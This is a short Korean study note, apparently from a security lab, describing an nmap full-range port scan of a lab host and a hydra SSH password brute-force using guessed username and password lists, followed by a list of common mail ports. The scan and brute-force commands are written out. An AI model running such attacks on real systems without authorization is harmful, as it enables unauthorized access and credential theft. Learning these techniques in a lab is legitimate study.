1) nmap을 활용한 공격


nmap - v -p1-65535 10.0.2.101 명령어로 무슨 포트가 열려있는지 확인한다

user.txt를 만들어서 그 중에 짐작이 가는 이름을 넣어준다

passwd.txt를 만들어서 그 중에 짐작이 가는 패스워드를 넣어준다

hydra.txt 파일을 만들고 mv명령을 적용한다

hydra -L user.txt -P passwd.txt 10.0.2.101 ssh 명령어를 입력하면 10.0.2.101아이피가 있는곳에
ssh공격을 날려서 상대방이 ssh로 접속할 때 사용하는 아이디와 비밀번호를 알아낼 수 있다.

공격을 당한 10.0.2.101 로 들어와서 다음 명령어를 치고 확인하면 로그가 찍혀있는 것을 볼 수 있다.

주요 사실

    smtp(보내는 것) : 25
pop(받는 것) : 110
imap(받는 것) : 143
    minho | minho2054@naver.com | @minho